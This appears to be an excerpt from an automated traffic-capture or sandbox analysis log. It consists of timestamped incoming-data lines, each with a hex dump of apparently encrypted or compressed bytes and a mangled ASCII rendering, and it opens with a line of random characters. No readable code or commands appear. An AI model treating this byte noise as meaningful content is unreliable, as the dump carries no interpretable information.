=^D$+&\|lxqXsw,;Lt-s#"VX7O-0Z[fBRTJVTNB#F(>p b>lEW{)S!^.k<:$wjLQjd-SVR4gBNY@7<M102 qudmSMP7/3
2021-11-22 13:07:59 UTC	193	IN	Data Raw: 2b ef 5e db 9b f6 f9 b1 09 5c 59 e6 20 e2 dc 10 b7 c4 64 b3 7a 19 c5 4d 65 7c f2 11 c8 de 12 c0 e1 65 62 3a 9f 4f 07 b5 e0 36 b1 e2 34 8e 04 e7 d4 d7 3d e7 78 b4 ce 3c 17 57 f3 4f 37 a2 01 a2 94 ee 50 57 e4 57 e4 32 a4 61 6d b1 41 8b 54 ba 1e db 79 52 bd ec e1 29 cf 4c 39 87 ab f6 68 43 c5 44 99 48 41 39 56 c5 86 9b d5 8c f2 27 b6 35 ed 78 a0 a3 0f 05 f1 ee 5f 69 2c 48 a7 8d ad 45 ab 69 ab a8 63 7f 5c 1a 96 41 b3 5c da 48 e2 47 d8 8e 53 21 cc 8e 45 74 f5 b5 8d b1 ac 3b 16 07 f3 2e 17 9a 15 2f 9d db 70 d7 45 dd ed de c5 4c 9b 84 a2 02 69 19 30 64 81 23 f9 56 29 9d f1 15 f0 4c 6c 3f bb 10 e5 8c b7 4c 71 cc 01 22 1a cd d4 0f 16 4d 12 04 05 1b d0 aa f6 03 04 7a 22 95 b4 ca 14 46 3b 38 99 b7 cb 46 33 f0 06 7e 3b 6e e5 9a a3 c5 82 fd 5b 10 a9 63 2c 98 80 54 0f Data Ascii: +^\Y dzMe\|eb:O64=x<WO7PWW2amATyR)L9hCDHA9V'5x_i,HEic\A\HGS!Et;./pELi0d#V)Ll?Lq"Mz"F;8F3~;n[c,T
2021-11-22 13:07:59 UTC	194	IN	Data Raw: 6c 20 81 e8 0b 7d af b7 2b ba 78 88 ad de c6 15 0e be 4a f8 c3 96 94 d3 2d 9a 74 97 f8 ee 80 f1 dd 01 2d d3 df 6f a9 90 f2 f8 5f f0 64 c1 19 75 1d 42 ed f6 47 28 bb a9 4c af 22 35 b7 3c e9 bf ab 33 3f 2d 09 cc ab c3 7b a4 54 6b 37 80 34 37 ae b9 8d a3 95 9c 31 78 b5 f4 2d 6f cc 06 1d 63 7b 1b 2d 82 96 f4 81 92 df 8a 05 be d3 37 21 4d 84 30 23 a9 2f 20 d2 a6 27 9e a1 19 52 b1 5a db 83 60 5a 6c ab 53 50 b0 81 aa ac 50 b4 36 81 df 03 33 b4 ad d5 7b 69 83 a2 9c 08 0a e5 78 d6 88 8f 3c c7 c2 d2 d5 c9 7f e6 91 37 7b 06 95 38 2e ea f5 2e ae 4c 52 e6 e0 24 14 69 b2 d2 d5 d2 41 4b d4 5b 60 7a 1b 31 62 ae 09 d2 fc 0c a3 2c cc 17 49 27 08 1f 93 ca 80 34 ab b8 79 5a b5 a5 bb 2f a1 4d 41 2d 9e 86 52 9f 5d b8 20 96 72 f8 ba d1 54 b6 7b 9f 9f a8 e9 68 c4 11 3a ef 7b 3d Data Ascii: l }+xJ-t-o_duBG(L"5<3?-{Tk7471x-oc{-7!M0#/ 'RZ`ZlSPP63{ix<7{8..LR$iAK[`z1b,I'4yZ/MA-R] rT{h:{=
2021-11-22 13:07:59 UTC	196	IN	Data Raw: 7f f8 bd f0 1a e4 e4 48 5c d2 8a 1b 6b 55 ce a9 eb e9 e8 e7 c3 83 c0 27 ba 11 eb bf 06 d6 9d bf cd b1 14 8c 21 37 d8 a0 8e 01 38 f2 c5 d6 b1 ea 34 1b 82 b8 2e 5f 0f 1c 8c d6 db 12 5a 46 7c a6 de a1 a1 b8 23 e9 00 0f 58 30 00 c4 21 91 16 29 da b7 17 b3 0c 6c 7c fd 12 a0 cd b7 03 37 ce 46 6b 1a 8e 92 0d 77 1f 12 6b 43 1a b3 f9 f6 6a 42 78 47 c5 b4 a3 52 47 5c 69 99 fa 8c 44 70 ca 06 2b 7c 6c a0 a3 a3 90 c5 fc 1c 28 a9 38 6b 9a e1 0d 0e 5b be 8a 47 5f fe 44 93 e3 c4 19 25 c7 24 71 f6 c6 04 18 75 82 ea 4b 62 a5 ac 18 24 dc 35 9c 2a 93 f0 6c 96 c8 fc 28 c6 59 4e ea 7e 7b 36 30 62 10 6c f8 39 7d 9a 55 6d c3 97 fb cb a8 67 22 1c f0 51 2a cf 5b 6b 53 7a 5c 84 14 b2 ef 5c e2 45 3e 14 a7 b0 eb bf 69 f5 d0 da fa 9b a5 e4 b9 06 be a6 02 bf 2d dd 47 3b 48 af a6 e9 45 Data Ascii: H\kU'!784._ZF\|#X0!)l\|7FkwkCjBxGRG\iDp+\|l(8k[G_D%$quKb$5l(YN~{60bl9}Umg"Q[kSz\\E>i-G;HE
2021-11-22 13:07:59 UTC	197	IN	Data Raw: 54 21 2a e7 30 4b ca 2f 73 ab d5 53 fb cc 37 11 1f 32 b7 e6 07 2e 05 c4 3d 23 9e c6 cf c2 35 c6 5e e2 e4 49 5a d7 df ba 02 06 e5 d6 b2 5e 63 96 0d b7 e4 cd 57 b4 27 b6 d5 9a 1a 88 f1 76 08 7f fb 5b 2e b8 90 4d cb 25 2e 83 30 42 6d 07 d1 d2 86 bc 25 1b a6 34 03 7a 5a 42 01 ae 4a b6 54 55 c7 2c 88 73 4d 62 6c 1f d5 ae 80 73 cf b8 31 3e b4 c2 17 73 fe 04 25 2d dd e3 26 c8 34 d6 44 f9 05 ac d2 a3 3b d7 5d e1 ed c7 8a 0d b3 62 73 8b 7b 7a cf fb 16 89 44 43 28 97 0f 51 f8 f6 13 ee e0 ae b1 27 39 a5 47 2a a5 cd 10 74 23 db 3b d4 da e1 a0 0c 0d 1f 4c 38 6f 82 b4 7d d5 6f 66 75 ec cd ff 3d c9 4e 3c 10 83 c6 8b b7 be 51 ba 79 b9 ff 89 58 17 53 1b 57 30 16 91 76 df f5 66 f9 8d b3 78 02 5a e5 fe c4 eb 12 9c 58 69 4a 36 10 3a b8 06 62 a4 71 b2 68 5f 66 1f f9 c6 58 60 Data Ascii: T!0K/sS72.=#5^IZ^cW'v[.M%.0Bm%4zZBJTU,sMbls1>s%-&4D;]bs{zDC(Q'9Gt#;L8o}ofu=N<QyXSW0vfxZXiJ6:bqh_fX`
2021-11-22 13:07:59 UTC	198	IN	Data Raw: 95 6b 77 0b 6f ec d0 b0 78 22 3b 62 ea df 89 2b 4b de 72 16 57 09 e5 83 c6 a2 dd b2 3a 02 cc 70 5f ff f4 15 40 58 94 ef 24 7f 9b 54 8b a5 c8 32 40 ef 02 1c f4 81 77 3f 49 dd ef 6a 0e 84 aa 79 0c f1 35 9d 07 e7 e5 45 f8 e4 db 45 e1 78 22 ed 78 1a 38 1d 62 33 41 8c 08 50 f7 43 63 aa 9c d6 85 8b 43 47 5f fe 34 1a c0 32 42 7f 34 7b a0 71 f5 d2 25 da 69 70 12 af a1 b4 99 5f c2 c6 dc a9 bc 99 88 b7 01 df a8 2e bf 2e f1 33 01 47 da ac cc 0b 61 46 b2 84 c4 e0 2f 5e 69 c3 8d fc c0 e4 f9 5e 65 fb 4e 45 19 e7 19 78 ea b5 1c 1f c5 f7 b0 47 1c a2 69 a5 13 a9 53 1a cc e7 cb 48 72 56 4c 5e 96 d4 85 e7 48 22 47 bf 7c 69 24 b5 41 56 06 b9 4a 5c c1 14 83 23 72 6b 2f 6a b2 97 b9 14 8f 3a 52 27 ed 33 15 1b bf 36 9f c8 27 c0 b9 66 2f 35 46 94 5b 09 86 3b ad 51 8a e2 98 18 6e Data Ascii: kwox";b+KrW:p_@X$T2@w?Ijy5EEx"x8b3APCcCG_42B4{q%ip_..3GaF/^i^eNExGiSHrVL^H"G\|i$AVJ\#rk/j:R'36'f/5F[;Qn
2021-11-22 13:07:59 UTC	200	IN	Data Raw: f9 0d 2e c6 cc 10 72 d5 28 41 65 f3 e2 37 d2 32 dc 55 fa 17 b6 db bc 3b f7 4d c5 ed c1 8b 1d b4 74 3a ab 1e 5b cb fa 2a 8f 7d 41 21 91 19 52 f5 cb 05 87 cd ab a0 2c 6b 84 43 2c d0 fe 1f 63 34 f2 36 b0 f2 eb af 29 79 09 5a 51 6e 93 c0 59 b1 46 1f 61 d6 e3 bb 00 eb 4f 31 1b 83 c1 ff 8c b8 55 95 69 ac e8 8c 77 03 49 1f 30 13 1e f0 76 c9 c0 4d c1 9e a9 6e 3a 41 e4 97 e1 ed 1a 88 31 76 4e 36 26 19 b7 27 73 85 7f ae 60 4d 66 15 f3 b5 6a 71 23 6b fc 94 8c fb 41 54 0f 87 4e 04 b8 7d f9 b6 0b ff 2b a6 ab 0e 0a cf 95 6c a6 aa 77 8c ac 19 1d 4e fa 96 70 1a 98 46 c5 23 7a d5 69 a6 a0 86 53 4c 14 c1 ba 2d 19 3f 88 23 5e 2a 6f 09 f6 87 24 6e b8 fa 84 46 d6 d6 3c 15 1d ff 20 03 7f 83 12 26 d8 b5 b9 72 a3 2d 54 35 ca b5 16 3a 84 14 e4 32 36 5b 23 3e cb 8c a4 f9 9c 0b f0 Data Ascii: .r(Ae72U;Mt:[}A!R,kC,c46)yZQnYFaO1UiwI0vMn:A1vN6&'s`Mfjq#kATN}+lwNpF#ziSL-?#^o$nF< &r-T5:26[#>
2021-11-22 13:07:59 UTC	201	IN	Data Raw: 56 a8 7a 92 d2 34 aa 49 50 17 b1 93 dd 8a 52 b6 ca e7 9b 88 98 97 8c 26 ca ad 4b d8 2c e0 18 13 6e c1 b4 c8 45 42 42 d7 c7 ca 85 1f 68 19 f4 8b 8a ef e9 9c 6b 42 9a 6b 49 19 f5 15 0c d7 ac 6e 13 da 9e b0 4b 6e 89 61 c8 10 c0 34 18 d1 b8 ce 4f 65 70 6d 6c 8f c3 ec fa 4a 03 76 83 0f 59 24 92 20 79 09 b9 6e 53 b5 0f aa 4c 5a 71 5a 58 bd e5 b0 1f e2 17 38 40 e9 2d 4a 29 a7 59 9f c7 54 d7 9d 07 27 3a 46 95 54 7d be 01 df 7c 85 97 b8 07 20 f6 87 0b 7b c5 6c 6d d8 57 cb c6 9d 8f a3 0e 24 0f fc a1 bb 95 9f 5f b0 3e f7 bb c9 ed 92 be f5 55 bb df 4e cd f5 ac 9a 35 83 17 8b 75 3d 77 fd 88 8d 26 40 cb e2 22 0d 7e 7a de 54 8b fc e8 f4 61 47 62 8a fe 3e 1b 84 32 0c 58 b6 58 5c c1 09 df c0 95 b8 5b 53 d1 37 6b 38 8f 23 72 1d 1d e5 77 8a f0 9b e0 f7 b4 1d 63 df 27 68 4a Data Ascii: Vz4IPR&K,nEBBhkBkInKna4OepmlJvY$ ynSLZqZX8@-J)YT':FT}\| {lmW$_>UN5u=w&@"~zTaGb>2XX\[S7k8#rwc'hJ
2021-11-22 13:07:59 UTC	202	IN	Data Raw: fa 5e c8 e8 5e dc 82 c0 46 20 5c ef 97 c5 e7 03 a7 17 49 79 27 3d 05 b0 1a 78 e9 79 b3 75 66 59 1f ef b5 42 6a 39 19 e6 93 8d d0 72 31 35 95 49 0f ba 18 fb b0 08 db 2b a1 8e 28 17 ce 8e 76 b8 de 75 8d 8b 32 0a 5f ed a0 61 16 93 36 c2 2f 61 e4 6c 82 a6 81 48 4a 18 b4 8d 27 77 1b 88 3d 44 22 62 0e 9a bd 29 64 8f f0 87 1c ed f8 71 22 33 e6 24 03 73 92 14 3b d2 db e9 74 b4 38 66 35 c8 b7 1b 2a a6 01 e4 29 30 57 56 2d cb f8 a9 c0 9d 1c f8 8d 99 17 ce e4 78 61 a1 9a 3a 06 79 e4 cf e2 df 85 e1 f3 ea c7 0d ba 37 cb cc 35 da 87 96 f0 96 28 b6 60 1e fe 91 d1 04 1e 91 ef e6 df d8 32 74 ab 9b 47 70 3f 6e 8c e7 b2 1f 71 46 6c 86 aa 9a a5 db 25 c3 75 07 69 73 08 ef 47 90 34 5c ea 90 63 99 25 02 38 dc 77 91 d4 f5 2c 1f aa 68 43 7d 87 b7 6e 79 2c 7c 7d 46 75 be d9 9f 69 Data Ascii: ^^F \Iy'=xyufYBj9r15I+(vu2_a6/alHJ'w=D"b)dq"3$s;t8f5*)0WV-xa:y75(`2tGp?nqFl%uisG4\c%8w,hC}ny,\|}Fui
2021-11-22 13:07:59 UTC	203	IN	Data Raw: 2e 41 94 ad 98 1a e2 2c 37 34 d7 04 02 24 a2 59 a6 c8 26 dc f7 45 32 50 05 83 3e 39 a9 6b 9a 4e ee d1 8b 6c 67 c2 ec 43 4e ae 2e 42 c7 3a ed dd 9d a5 b8 0e 26 14 fc a7 a0 95 8d 40 ac 35 e4 f8 ce f1 fe bb e4 36 97 ad 46 dd f1 f3 9b 25 f3 27 b6 1a 1a 6d fd 99 8e 47 68 c9 84 0a 0e 13 74 c6 3a 8b e1 aa fa 7f 24 6a fb aa 28 0b ea 24 1b 37 a2 44 1e ca 17 bc e9 e7 dc 73 21 b6 16 6d 67 89 30 1c 08 0a 80 5b f8 96 b8 92 90 b8 78 70 e5 0a 52 40 3f 84 73 4f cc 4e 52 d2 f2 48 dd c9 78 20 70 1a b2 f1 01 39 18 c4 21 29 e3 e4 da cd 22 d5 43 ee 96 47 5b d5 df d5 16 0c f7 fd fd 7e 6b 91 19 a4 88 fc 53 b3 11 b4 a3 a8 0b 87 e7 37 19 74 95 5b 5c ea 91 5c ae 0f 3d 94 71 62 60 1b d7 b3 bc 80 24 2a b0 3e 12 7a 59 58 0c cf 7a ab 06 73 c2 48 a9 65 4d 74 40 5e a2 89 f2 4d db cc 16 Data Ascii: .A,74$Y&E2P>9kNlgCN.B:&@56F%'mGht:$j($7Ds!mg0[xpR@?sONRHx p9!)"CG[~kS7t[\\=qb`$*>zYXzsHeMt@^M
2021-11-22 13:07:59 UTC	205	IN	Data Raw: 2c 08 3f a5 15 01 66 8d 0e 31 dc c1 80 7c bf 1f 5c 06 ce ae 14 26 b6 60 c3 39 2c 4d 33 27 80 de 83 e2 86 16 f4 9c de 3d d8 87 4e 68 a6 87 30 05 63 ef db fb c4 8b e5 f4 83 fb 1a c9 27 cb d2 6f e1 9c 99 f0 96 2a bd 4e 30 f5 91 eb 37 12 82 d3 f6 c3 da 18 78 a0 8e 2e 5a 23 7f 9f fc a8 1f 79 32 31 b5 b7 b6 91 d9 2a ee 61 1a 74 53 49 c2 4e 94 23 40 f4 94 65 a3 2f 1e 4e d2 71 80 f8 b7 16 08 bd 75 48 77 e8 86 78 78 2d 7b 64 60 34 93 d0 9b 7e 6d 14 47 f1 e7 a0 66 31 52 4c fc cb cb 09 5a ee 74 00 48 03 83 90 8d 80 eb 8f 2e 0e c5 32 4d e9 e9 29 20 74 80 d9 41 6a 88 49 b7 86 d2 5e 62 c4 17 38 ff f2 70 3b 53 e1 cc 70 62 86 81 6c 3e d7 5d b3 0e f7 f9 4b f2 e5 c7 28 ea 70 3a eb 5e 1e 26 78 25 11 50 bc 35 47 ff 50 51 ac 82 da ae 99 2e 45 3a cd 0e 3e f4 34 5e 7f 08 6e a4 Data Ascii: ,?f1\|\&`9,M3'=Nh0c'oN07x.Z#y21atSIN#@e/NquHwxx-{d`4~mGf1RLZtH.2M) tAjI^b8p;Spbl>]K(p:^&x%P5GPQ.E:>4^n
2021-11-22 13:07:59 UTC	206	IN	Data Raw: 20 1e 42 b6 50 4e df 03 cf ce e1 af 30 20 d3 26 40 14 a5 25 72 2f 0c f5 6e ef c6 82 85 e3 ba 69 77 ba 34 52 55 12 f0 55 4e d9 43 41 a6 c3 77 ec c4 6a 37 04 2d db f0 01 2e 33 df 36 3d c0 ed cb d8 35 e4 45 e4 97 61 47 c7 ad 83 10 1c ef d6 d9 66 7f 88 1d a4 e9 fb 53 91 2f a0 b9 bd 0c e6 f2 52 0f 59 d4 4c 5a 8b 96 46 c3 29 36 92 02 31 67 0c c6 8d 90 a0 26 3e b9 3e 0e 0e 68 31 05 cb 7c 8d 11 6e ca 5f b8 64 4d 46 7a 6d f2 b3 f3 34 cc dd 0d 05 ff c0 0b 74 a1 3e 24 59 c5 cd 37 e6 2e b8 62 e2 72 bb ce d1 1a c2 39 f4 eb a8 af 1c c0 56 4e ef 33 49 aa cc 29 95 48 41 39 e4 3d 63 f1 da 19 8a e9 b1 a6 24 0a b4 26 07 c8 f8 1f 63 00 d5 2d b9 f7 fa c1 0f 68 09 77 76 79 8b d6 59 c3 4d 09 54 c9 ed ba 70 ca 54 5d 24 93 c0 ff 97 b6 58 a0 1d 99 fe 81 5a 14 57 1f 53 21 72 d0 7f Data Ascii: BPN0 &@%r/niw4RUUNCAwj7-.36=5EaGfS/RYLZF)61g&>>h1\|n_dMFzm4t>$Y7.br9VN3I)HA9=c$&c-hwvyYMTpT]$XZWS!r
2021-11-22 13:07:59 UTC	207	IN	Data Raw: 13 f1 54 8d 53 64 f7 87 72 be 2f 14 4c bb 41 9c f8 c3 20 1c e0 55 48 62 b2 d4 5f 73 38 76 48 69 76 84 da 8e 7a 04 39 52 f3 d1 ab 70 06 57 43 cd dd b3 30 33 da 74 06 4f 09 a4 88 cf 82 e7 84 2f 6f ce 15 58 c5 c9 24 60 5c 8b de 41 60 8a 20 93 86 d5 0a 40 d9 17 71 d6 e4 70 0d 54 ec cd 6c 15 b5 81 60 15 94 66 ae 10 f6 d6 49 ff ee d3 6b c8 7f 3a ed 4e 0f 55 0b 16 06 41 99 31 5c f4 54 66 ac 9e c7 ae 92 5a 22 3c d6 3f 1a e3 23 5a 1a 38 6f cd 57 80 a6 18 df 0c 7b 06 c2 82 c1 fe 7d c3 99 db 8f fa 8d 91 db 2d cb c5 28 ca 49 f0 32 5e 64 da c0 c6 30 00 4c a2 84 e1 f3 5b 42 6f b1 a6 fc a9 c5 ea 2c 6d ec 23 67 6f 94 34 7a b5 a4 18 70 d1 e8 d4 41 18 ec 6c be 76 cc 42 7f de ce 9e 5c 61 24 40 48 fb f2 f2 94 69 21 18 af 78 0c 10 8c 20 7c 14 b9 65 4e b5 2a b7 4c 7d 6c 5a 7d Data Ascii: TSdr/LA UHb_s8vHivz9RpWC03tO/oX$`\A` @qpTl`fIk:NUA1\TfZ"<?#Z8oW{}-(I2^d0L[Bo,m#go4zpAlvB\a$@Hi!x \|eN*L}lZ}
2021-11-22 13:07:59 UTC	208	IN	Data Raw: cc 2e cb 69 ba 65 ab 8e 17 52 e0 bb e9 72 ab 0e 3d d1 19 07 5e 2c a0 0c cc 16 48 07 09 1e 82 c7 88 35 ab b9 79 5a b4 a5 72 02 81 4f 40 23 94 9e 53 9f 57 f5 59 c2 17 95 ca bd 3f c2 5c b9 ae 9c c7 58 ee 21 14 df 7b 3d ae 8e 46 fb 2b 27 4b f1 6e 0b 80 ad 7b e9 a9 cb c6 51 6a d2 2e 49 a3 8c 6a 1e 47 a8 7e d3 90 9b d3 70 0c 6f 3c 3e 19 f4 ac 3d a3 07 60 33 b6 94 cf 62 a0 26 48 65 fe a3 99 c4 d1 2e c6 05 d9 88 f1 16 76 3d 7b 35 52 70 83 1d b2 85 19 b5 ff c0 08 4f 35 93 9b a7 85 75 ea 50 12 2b 42 4f 64 d1 70 11 eb 0c f7 09 3d 0f 7a 8f e7 2e 02 55 0b 81 fe fd 8f 24 46 53 e2 28 60 c6 14 ad e4 65 9d 40 c5 d9 4d 6e f0 9e 37 95 b1 7f 98 8a 19 19 48 9f d3 0c 71 fd 24 b9 59 14 bb 14 aa ad dc 60 55 06 d8 a7 2b 78 19 84 20 59 4b 0d 64 92 ee 42 36 f7 94 ea 35 e9 ce 71 34 Data Ascii: .ieRr=^,H5yZrO@#SWY?\X!{=F+'Kn{Qj.IjG~po<>=`3b&He.v={5RpO5uP+BOdp=z.U$FS(`e@Mn7Hq$Y`U+x YKdB65q4
2021-11-22 13:07:59 UTC	210	IN	Data Raw: e1 39 26 44 5f 09 6f 6a d4 21 73 f5 1d e5 52 30 ba 33 37 42 ad b6 eb ea 3f a3 0a bc 71 6c 87 53 26 1e 7c 08 4c 55 f0 a6 5c b8 8d 13 74 e2 c6 b5 ec bb f7 93 95 da fa f1 f6 5a 0a b6 c5 4a ad c8 a9 55 df 60 a3 e0 a3 44 11 aa 8e 95 22 dc 4a 80 48 bd c2 89 a8 92 1c f9 39 1b 06 32 98 dd 78 2c b4 c4 64 77 b3 9c d5 3e 7c 6d 6d ce 66 a8 35 77 a6 b8 9a 31 16 35 22 3c fb b1 8d 9f 2a 50 16 e4 01 0e 47 7a 19 26 6d bf 2d 3b b4 57 d0 4e 1b 1b 5b 1f cb e0 f7 75 f0 de 27 45 a8 46 57 4e c3 53 fb a8 5a bd e6 86 7b 4d Data Ascii: 9&D_oj!sR037B?qlS&\|LU\tZJU`D"JH92x,dw>\|mmf5w15"<*PGz&m-;WN[u'EFWNSZ{M
2021-11-22 13:07:59 UTC	210	IN	Data Raw: 48 fb 3b 5d d9 79 5e 3f eb 97 f9 70 3c ae e8 0b 3f a0 70 2f b4 56 9e c4 9e c0 c9 00 41 44 fd c1 de 87 d9 25 d5 42 15 79 b4 93 97 c0 89 2a cd c3 34 aa 9c ef c9 54 f4 78 db 08 6b 12 e0 c0 e2 49 33 aa b1 50 7d 17 3c b6 30 f6 81 aa 90 12 38 1b bf a4 51 66 f7 4f 77 25 f1 28 1c af 76 bc a3 94 c0 22 66 b8 4f 03 7a c2 5f 0e 7b 7a 82 16 8d 95 e2 61 11 cd 9d d1 a8 3a 31 21 4f 85 2d 26 a7 36 27 de ba 3b 8b b3 98 df 71 40 db 9f 78 46 71 b7 4e 4c ad 9d b7 ae 4e b4 3f 86 f1 16 b2 21 ac cb 71 6e 96 b0 1d 85 0b fb 78 d3 a8 8e 25 c7 46 dd d5 ca 63 fa 88 2b 66 08 93 38 2d f6 e9 32 ac 48 58 e7 73 2d 12 79 b3 d3 cf d2 5d 4d f4 59 61 72 08 31 64 ae 0b d0 48 0a a1 3d dc 16 4c 32 1a 9e 1e cb 9e 34 be aa f8 d7 b5 bb 72 87 01 4a 02 23 8f 94 d3 06 5c ad 32 17 36 fb b4 df 5c b8 37 Data Ascii: H;]y^?p<?p/VAD%By*4TxkI3P}<08QfOw%(v"fOz_{za:1!O-&6';q@xFqNLN?!qnx%Fc+f8-2HXs-y]MYar1dH=L24rJ#\26\7
2021-11-22 13:07:59 UTC	211	IN	Data Raw: 91 41 4e bb 67 4f 8e 8c e4 0e c7 77 b9 fa ed 7d bd e1 23 10 de ee 5b 76 35 97 ac 90 a8 e0 91 05 b2 ac 60 dc 53 ae bb 42 b3 e9 f7 8d f8 42 c5 65 64 9e ed 86 4d 78 f2 82 96 bf a4 74 1b c4 e0 2b 19 4d 1b ee 82 5b ec 1d 4e 02 e4 d0 d8 e1 a5 43 b1 05 74 18 3e 7b 9d 3c fc 41 ab 8d e3 95 e1 57 6f 25 a7 0f f9 96 b5 47 77 cd 04 0d 1b c8 c9 0e 14 44 17 0f 05 18 cc a3 e4 3b 02 78 20 9e b1 cb 1a 40 3c 2c 84 bd d6 41 3b 85 06 6d 26 69 f8 e1 be d3 da fb 71 7a bb f2 25 98 8e 44 1b 2b 7b 83 26 16 f0 28 dc fe a4 43 20 af 7e 74 99 89 19 5f 21 9e bb 81 43 e9 f9 1d 7c 91 28 df 6a 9b aa 21 84 02 a1 35 a2 1f 53 8d 24 f9 58 6a e0 79 39 fd 41 30 87 36 38 c6 fe bd d6 ef 3c a0 42 a4 54 73 83 46 2b 08 f8 0f d0 11 fb b4 35 ad 2c 3c 72 d1 c4 a7 ff 37 b6 9b 86 e8 78 e5 e6 d5 41 a3 c0 Data Ascii: ANgOw}#[v5`SBBedMxt+M[NCt>{<AWo%GwD;x @<,A;m&iqz%D+{&(C ~t_!C\|(j!5S$Xjy9A068<BTsF+5,<r7xA
2021-11-22 13:07:59 UTC	212	IN	Data Raw: 1b 80 83 e2 62 99 dd 13 0a b4 5d 39 3c 43 8a 3e 36 b8 ad 91 d0 a8 29 96 bc 17 59 50 5e ce 91 e6 f7 6e b8 53 43 b1 86 bf be d2 19 35 8f ea 0f 13 b4 b8 c4 f3 d8 81 b1 9c 1b 0b e2 6d c7 0a 3e 34 c9 40 dd d2 cb 6d 67 a0 25 fb e2 8f 3f 24 e4 e0 3c 2c 45 5a e8 7f 3f 1a 74 bc dc df c7 50 c9 65 59 6e 74 13 2c 6c a7 0f d7 5a 18 ad 3e a5 0a 43 21 08 1c 92 c4 8e 3a b9 bf 7c 4f a6 24 eb 06 af 50 4f 3f 18 33 40 f6 4f 39 81 90 52 f9 a8 53 e7 b8 3c 91 9f ba 6b d5 c6 31 3b fd f9 fc a2 8a 46 fa 36 2e 43 eb 7b 15 94 ad f6 77 ae d0 c9 47 65 c8 3b 40 ad b4 7f 16 53 a8 de 4d 97 9c 40 28 18 6f a9 a1 0d e8 a1 2e 30 92 67 34 25 cc c0 7e a6 32 dd d7 e8 b0 e2 ed ca 3e c6 9c 98 88 8c 1d 6b 33 72 3a 55 71 80 93 73 9d 28 37 21 dc 09 6f 35 93 17 33 8f 77 fb 4d 08 ae db 4e 64 58 35 18 Data Ascii: b]9<C>6)YP^nSC5m>4@mg%?$<,EZ?tPeYnt,lZ>C!:\|O$PO?3@O9RS<k1;F6.C{wGe;@SM@(o.0g4%~2>k3r:Uqs(7!o53wMNdX5
2021-11-22 13:07:59 UTC	214	IN	Data Raw: c6 c7 0c 1f 4c 03 8a 00 18 de ad 77 4e 00 58 22 90 b5 d1 13 4d 35 32 9c a4 d9 c6 12 91 14 06 26 69 f8 f8 be ca 9f fe 52 4f ab 62 ae af 9d 4f 13 3c f5 8d 22 05 fb 3c c9 ff bc 42 38 a3 6b 77 b1 83 05 54 20 87 a7 03 64 e0 f8 0a 54 9a 28 c6 7f 9d aa 36 a3 89 b4 2c ba 14 40 95 33 73 5d 4c 65 6c 31 ea dd ac 9b 21 a4 83 e5 a1 4a 73 2f 30 de f9 5f 72 88 55 26 07 7f 14 df 95 f5 ba 54 b7 02 22 6f de d6 35 be 28 df 91 8e f9 e7 f0 f9 c7 52 a2 d8 49 b8 49 96 55 dc b8 a1 ce 88 42 11 3e c5 05 3a 84 49 80 59 a4 f0 0b 30 81 8e ad 6b 92 3f 2e 05 9a 72 1e 37 c0 60 62 32 de dc 2a 7c 85 1a 49 d7 a1 3c 74 b8 be 90 35 19 2a 0a 37 ea 33 c8 9c 2d 55 10 e4 01 1d d4 b6 26 3b 60 b7 23 31 bd 4f c0 4d 1c 13 5e 1e d6 eb f4 7d e2 5b 53 50 86 4f 42 45 c5 5e fa a5 5a bd ff 0f 4a 47 41 f8 Data Ascii: LwNX"M52&iRObO<"<B8kwT dT(6,@3s]Lel1!Js/0_rU&T"o5(RIIUB>:IY0k?.r7`b2\|I<t573-U&;`#1OM^}[SPOBE^ZJGA
2021-11-22 13:07:59 UTC	215	IN	Data Raw: dd 94 78 38 0f 0b 9d c4 9d 3c b6 b0 64 52 a9 ad 6f 0f a9 45 49 30 92 8e 4f 97 55 b0 32 ff 7a f0 b2 cc 56 b3 39 b3 9d a6 e7 41 c7 03 2f fd fa a4 ab 9d c7 bb 25 2e 58 f6 fd 8a 80 ad f6 ae a1 d0 da 54 65 c8 3b 4b ad 84 7d 1b 43 b2 4d 55 d6 9c a8 60 05 77 2f 30 02 e8 ba 32 b9 05 6e 2e bf 8b c2 6c ba a2 68 79 fb a7 96 e0 ca 3e c6 9f 5d 87 e0 08 73 2f f8 2d 48 77 83 78 bd 81 3b a9 f1 c5 11 4a 24 86 9f ac 8a 6a fb 4a 98 ae 4c 52 73 cb f6 2f fb 77 d3 21 39 1d f9 a4 cc 0b 00 5f 04 90 fe f1 92 27 5c 42 c6 21 61 c9 1b ad c3 66 80 46 d1 d8 4c 79 b3 c8 1e dc cb 00 69 66 6c 6e bb df c1 6c 77 e8 24 30 d3 14 a9 9b a7 da fc 33 a4 36 ba db 59 9b dc ef 41 22 59 8f 69 98 e0 5e 02 ea 17 5b 30 aa b9 56 66 59 85 46 f0 8b e9 6f 5a bb 95 e8 01 50 d1 3a 7e bf c1 7f 5e c0 7d 95 4e Data Ascii: x8<dRoEI0OU2zV9A/%.XTe;K}CMU`w/02n.lhy>]s/-Hwx;J$jJLRs/w!9_'\B!afFLyiflnlw$036YA"Yi^[0VfYFoZP:~^}N
2021-11-22 13:07:59 UTC	216	IN	Data Raw: 2a 24 4e 39 c9 6a 83 5b 2e 1a 7e 1c cd 14 f5 a2 5b aa 0c 3e 77 2d c7 b4 fe 3e b0 88 13 66 fe ac e4 db 4f ba c5 49 bf 49 90 47 5a 01 af c4 a0 55 00 2b d3 8b a3 85 5b 05 e9 b1 e2 8a ad 80 93 2c 2b 9e 23 d0 19 94 7e 0a b2 c7 68 7b b6 98 c9 33 ee 40 0d ce 6b b8 b4 d7 be bf 9a 33 1f 2c 0a 3b db b0 8d 9c 20 51 12 e8 05 04 5e e7 3d 3e 6b b1 25 31 b0 6b c2 46 17 13 5e 3e d6 e7 fd 72 e5 5a 59 4b 80 4f 42 4e ed 5b f7 a5 5c a6 f0 17 49 57 4e ee 34 75 d3 77 d5 22 e6 90 ea ef a1 ba e4 03 36 aa 4c 2a b2 5c 88 ab 8c 44 49 07 45 66 f4 d2 53 14 cf af 48 5b 94 fa b9 02 7f cd 17 b7 c1 5c a8 ae 81 f2 d1 45 70 e5 c1 1a 5f 1b ec 5f 7e 41 2e b9 8f 5c fc 92 38 b7 3b e1 8c a1 98 0c 36 8b 8f b8 ce 7f f8 c3 6f 33 d9 24 9e 01 7f bb bf 97 d7 2c 5b be 4f 0e e7 68 4a 00 44 64 8a 16 96 Data Ascii: $N9j[.~[>w->fOIIGZU+[,+#~h{3@k3,; Q^=>k%1kF^>rZYKOBN[\IWN4uw"6L\DIEfSH[\Ep__~A.\8;6o3$,[OhJDd
